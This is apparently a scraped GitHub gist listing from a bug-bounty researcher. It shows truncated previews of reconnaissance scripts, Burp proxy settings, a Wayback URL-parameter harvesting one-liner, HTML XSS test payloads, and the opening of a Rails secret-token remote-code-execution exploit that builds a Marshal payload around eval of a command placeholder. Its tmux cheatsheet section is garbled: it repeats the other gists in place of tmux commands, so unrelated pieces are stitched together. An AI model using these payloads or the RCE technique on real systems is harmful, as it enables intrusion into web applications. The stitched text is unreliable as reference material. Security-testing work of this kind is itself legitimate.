Arbaz Hussain arbazkiraak

## s3_bucket_region_checker.py
#!/usr/bin/env python
import boto3,sys,time,requests
import botocore.exceptions
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
import datetime,os

os.environ['AWS_DEFAULT_REGION'] = 'us-east-1'

s3 = boto3.resource('s3')

## gist:4defc9a0262c2ab115a996f3496be022
curl -s "http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey" | grep -P "=" | sed  "/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d" > Output.txt ; for i in $(cat Output.txt);do  URL="${i}"; LIST=(${URL//[=&]/=FUZZ&}); echo ${LIST} | awk -F'=' -vOFS='=' '{$NF="FUZZ"}1;' >> Passive_Collecting_URLParamter.txt ; done ; rm Output.txt ; sort -u  Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt

## send_urls_to_burp
#!/usr/bin/python3

import requests,sys
import urllib3,queue,threading
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}


urls_inp = sys.argv[1]

## foxyproxyBB.json
{
  "84kr3q1592995213323": {
    "type": 1,
    "color": "#cc883a",
    "title": "Burp",
    "active": true,
    "address": "127.0.0.1",
    "port": 8080,
    "proxyDNS": false,
    "username": "",

## bb-foxyproxy-pattern.json
{
	"30523382": {
		"className": "Proxy",
		"data": {
			"bypassFPForPAC": true,
			"color": "#f57575",
			"configUrl": "",
			"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
			"cycle": false,
			"enabled": true,

## phantonjs-xss.html
<html>
<head></head>
<body>

<a href="javascript: alert('clicked xss link')" id="link">click me</a>
<img src="xx" onerror="alert('xss')" />
</body>
</html>

## rails-secret-token-rce.rb
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
    marshal_payload = Base64.encode64(
      "\x04\x08" +
      "o" +

## offsets
[array('i', [143, 150]),
 array('i', [207, 214]),
 array('i', [753, 760]),
 array('i', [931, 938]),
 array('i', [1140, 1147]),
 array('i', [1390, 1397]),
 array('i', [1543, 1550]),
 array('i', [1666, 1673]),
 array('i', [1950, 1957]),
 array('i', [4193, 4200]),

## gist:77bb058366e5d646cf4f58869e4da190
from  burp import IBurpExtender,IProxyListener

class BurpExtender(IBurpExtender,IProxyListener):
    def registerExtenderCallbacks(self,callbacks):
        self._helpers = callbacks.getHelpers()
        self._callbacks = callbacks
        self._callbacks.setExtensionName("IProxyListener Params")
        self._callbacks.registerProxyListener(self)

    def processProxyMessage(self,messageIsRequest,message):

## tmux_cheatsheet.markdown

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                arbazkiraak
                / tmux_cheatsheet.markdown
            
            
              Created
              March 17, 2018 10:10
                — forked from henrik/tmux_cheatsheet.markdown
            
              
                tmux cheatsheet
              
          
    tmux cheatsheet

As configured in my dotfiles.
start new:
tmux

start new with session name:
	#!/usr/bin/env python
	import boto3,sys,time,requests
	import botocore.exceptions
	from urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
	import datetime,os

	os.environ['AWS_DEFAULT_REGION'] = 'us-east-1'

	s3 = boto3.resource('s3')
	#!/usr/bin/python3

	import requests,sys
	import urllib3,queue,threading
	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
	headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}
	proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}


	urls_inp = sys.argv[1]
	{
	"84kr3q1592995213323": {
	"type": 1,
	"color": "#cc883a",
	"title": "Burp",
	"active": true,
	"address": "127.0.0.1",
	"port": 8080,
	"proxyDNS": false,
	"username": "",
	{
	"30523382": {
	"className": "Proxy",
	"data": {
	"bypassFPForPAC": true,
	"color": "#f57575",
	"configUrl": "",
	"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
	"cycle": false,
	"enabled": true,
	<html>
	<head></head>
	<body>

	<a href="javascript: alert('clicked xss link')" id="link">click me</a>
	<img src="xx" onerror="alert('xss')" />
	</body>
	</html>
	#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
	require 'base64'
	require 'openssl'
	require 'optparse'
	require 'open-uri'
	SECRET_TOKEN = "SECRET HERE"
	code = "eval('`COMMAND HERE`')"
	marshal_payload = Base64.encode64(
	"\x04\x08" +
	"o" +
	[array('i', [143, 150]),
	array('i', [207, 214]),
	array('i', [753, 760]),
	array('i', [931, 938]),
	array('i', [1140, 1147]),
	array('i', [1390, 1397]),
	array('i', [1543, 1550]),
	array('i', [1666, 1673]),
	array('i', [1950, 1957]),
	array('i', [4193, 4200]),
	from burp import IBurpExtender,IProxyListener

	class BurpExtender(IBurpExtender,IProxyListener):
	def registerExtenderCallbacks(self,callbacks):
	self._helpers = callbacks.getHelpers()
	self._callbacks = callbacks
	self._callbacks.setExtensionName("IProxyListener Params")
	self._callbacks.registerProxyListener(self)

	def processProxyMessage(self,messageIsRequest,message):